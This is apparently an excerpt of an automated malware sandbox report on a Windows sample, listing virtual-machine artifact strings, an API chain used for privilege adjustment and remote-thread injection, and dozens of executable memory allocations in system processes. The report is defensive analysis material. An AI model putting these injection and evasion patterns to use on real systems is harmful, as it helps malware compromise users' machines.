        Source: SearchApp.exe, 00000013.00000000.2135580093.0000024B5A743000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware Workstation\vmnetcfg.exe12004
        Source: SearchApp.exe, 00000013.00000000.2002896960.0000024B44457000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware.Workstation.vmplayer
        Source: explorer.exe, 0000000D.00000000.1885971448.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
        Source: explorer.exe, 0000000D.00000000.1883356157.00000000078A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
        Source: explorer.exe, 0000000D.00000000.1887146346.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
        Source: explorer.exe, 0000000D.00000003.3107470432.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
        Source: SearchApp.exe, 00000013.00000000.2130745827.0000024B5A0EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Downloading data https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w...
        Source: explorer.exe, 0000000D.00000000.1883356157.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
        Source: SearchApp.exe, 00000013.00000000.1982125525.0000024B422F2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nhttps://r.bing.com/rp/KzWxoKDHqNy24XFwlA6xWw89_DA.br.jsaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
        Source: explorer.exe, 0000000D.00000000.1885971448.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
        Source: svchost.exe, 00000009.00000000.1857082282.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;
        Source: SearchApp.exe, 00000013.00000000.2111337872.0000024B59D5E000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1990860553.0000024B4402B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
        Source: SearchApp.exe, 00000013.00000000.2046862544.0000024B55466000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: lyncvmwareonenoteneroXK
        Source: SearchApp.exe, 00000013.00000000.1982125525.0000024B422F2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=wses
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
        Source: explorer.exe, 0000000D.00000000.1880009773.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
        Source: explorer.exe, 0000000D.00000000.1885971448.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
        Source: SearchApp.exe, 00000013.00000000.2002896960.0000024B44457000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware.Horizon.Client
        Source: RuntimeBroker.exe, 00000012.00000000.1948731468.000001ECFA2A4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_00987AC0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00987AC0
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_00901EF6 OpenProcess,GetLastError,GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,OpenProcess,AdjustTokenPrivileges,CloseHandle,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,LookupAccountSidA,lstrcmpiA,lstrcmpiA,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualAllocEx,lstrlen,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,0_2_00901EF6
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeProcess token adjusted: DebugJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: D30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 830000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\dwm.exe base: 8F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\sihost.exe base: AC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: 910000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: 9A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: A50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\explorer.exe base: 11C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: D40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 110000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: A90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: AB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 290000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 580000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 3D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 900000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 180000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 190000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: 9F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\dllhost.exe base: A10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\conhost.exe base: C00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 320000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: B10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 7F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 840000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: C90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: CA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1290000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 12A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: F60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: F70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: DA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: DB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 7D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 7E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 13A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 13B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 790000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 7A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: E00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: E50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 15A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 15F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 700000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 710000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 7D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 7E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1340000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1390000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1300000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1310000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 690000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 6A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 5D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 5E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: FB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: FC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: F10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: F20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 590000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 5A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 800000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 850000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: F80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: F90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1050000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1060000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: DA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: DB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 14B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 14C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 580000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 590000 protect: page execute and read and writeJump to behavior
